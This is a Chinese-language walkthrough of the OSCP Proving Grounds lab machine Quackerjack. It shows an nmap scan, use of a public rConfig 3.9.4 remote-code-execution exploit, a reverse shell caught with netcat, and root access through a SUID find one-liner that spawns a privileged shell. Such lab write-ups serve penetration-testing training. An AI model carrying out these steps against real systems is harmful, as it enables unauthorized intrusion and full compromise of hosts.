OSCP - Proving Grounds - Quackerjack

主要知识点

• 端口转发
  

具体步骤

执行nmap扫描,开了很多多少端口，我先试验80和8081，看起来8081比较风趣

1. Nmap scan report for 192.168.51.57
2. Host is up (0.0011s latency).
3. Not shown: 65527 filtered tcp ports (no-response)
4. PORT     STATE SERVICE     VERSION
5. 21/tcp   open  ftp         vsftpd 3.0.2
6. | ftp-syst:
7. |   STAT:
8. | FTP server status:
9. |      Connected to ::ffff:192.168.49.51
10. |      Logged in as ftp
11. |      TYPE: ASCII
12. |      No session bandwidth limit
13. |      Session timeout in seconds is 300
14. |      Control connection is plain text
15. |      Data connections will be plain text
16. |      At session startup, client count was 3
17. |      vsFTPd 3.0.2 - secure, fast, stable
18. |_End of status
19. | ftp-anon: Anonymous FTP login allowed (FTP code 230)
20. |_Can't get directory listing: TIMEOUT
21. 22/tcp   open  ssh         OpenSSH 7.4 (protocol 2.0)
22. | ssh-hostkey:
23. |   2048 a2:ec:75:8d:86:9b:a3:0b:d3:b6:2f:64:04:f9:fd:25 (RSA)
24. |   256 b6:d2:fd:bb:08:9a:35:02:7b:33:e3:72:5d:dc:64:82 (ECDSA)
25. |_  256 08:95:d6:60:52:17:3d:03:e4:7d:90:fd:b2:ed:44:86 (ED25519)
26. 80/tcp   open  http        Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)
27. |_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
28. |_http-title: Apache HTTP Server Test Page powered by CentOS
29. | http-methods:
30. |_  Potentially risky methods: TRACE
31. 111/tcp  open  rpcbind     2-4 (RPC #100000)
32. | rpcinfo:
33. |   program version    port/proto  service
34. |   100000  2,3,4        111/tcp   rpcbind
35. |   100000  2,3,4        111/udp   rpcbind
36. |   100000  3,4          111/tcp6  rpcbind
37. |_  100000  3,4          111/udp6  rpcbind
38. 139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA)
39. 445/tcp  open  netbios-ssn Samba smbd 4.10.4 (workgroup: SAMBA)
40. 3306/tcp open  mysql       MariaDB (unauthorized)
41. 8081/tcp open  http        Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)
42. |_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
43. |_http-title: 400 Bad Request

复制代码

访问8081端口，发现rConfig 3.9.4正在运行

搜索一下exploit得到了 rConfig 3.9.4 - 'searchField' Unauthenticated Root Remote Code Execution - PHP webapps Exploit 需要修改一下exp,在发送request的时间加入 verify=False参数，否则会报自签名证书错误，不外照旧会失败在下面这一步，不外至少创建出了admin用户，把exp最后的删除admin user的代码去掉，保留admin权限

1. [+] Adding a temporary admin user...
2. [+] Authenticating as pxaovedjzi...
3. [+] Logged in successfully, triggering the payload...
4. [+] Check your listener !
5. [-] The command was not executed by the target or you forgot to open a listener...
6. [+] Removing the temporary admin user...
7. [+] Done.

复制代码

继承搜索信息，得到了https://gist.github.com/farid007/9f6ad063645d5b1550298c8b9ae953ff 
看来同样具有admin+file upload漏洞，得到reverse shell

1. C:\home\kali\Documents\OFFSEC\GoToWork\Quackerjack> nc -nlvp 80  
2. listening on [any] 80 ...
3. connect to [192.168.45.189] from (UNKNOWN) [192.168.162.57] 47790
4. Linux quackerjack 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
5. 11:04:35 up 13 min,  0 users,  load average: 0.00, 0.00, 0.00
6. USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
7. uid=48(apache) gid=48(apache) groups=48(apache)
8. sh: no job control in this shell
9. sh-4.2$
10. sh-4.2$ id
11. id
12. uid=48(apache) gid=48(apache) groups=48(apache)

复制代码

继承探求信息，发现 /usr/bin/find命令有 SUID权限，直接利用，得到root权限

1. bash-4.2$ find / -type f -perm -4000 2>/dev/null
2. find / -type f -perm -4000 2>/dev/null
3. /usr/bin/find
4. ......
5. ......
6. /usr/libexec/dbus-1/dbus-daemon-launch-helper
7. bash-4.2$ /usr/bin/find . -exec /bin/sh -p \; -quit
8. /usr/bin/find . -exec /bin/sh -p \; -quit
9. sh-4.2# id
10. id
11. uid=48(apache) gid=48(apache) euid=0(root) groups=48(apache)
12. sh-4.2# cat /root/proof.txt
13. cat /root/proof.txt
14. 307a236503d332668cdf2eb1fd38c2f1

复制代码

 

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。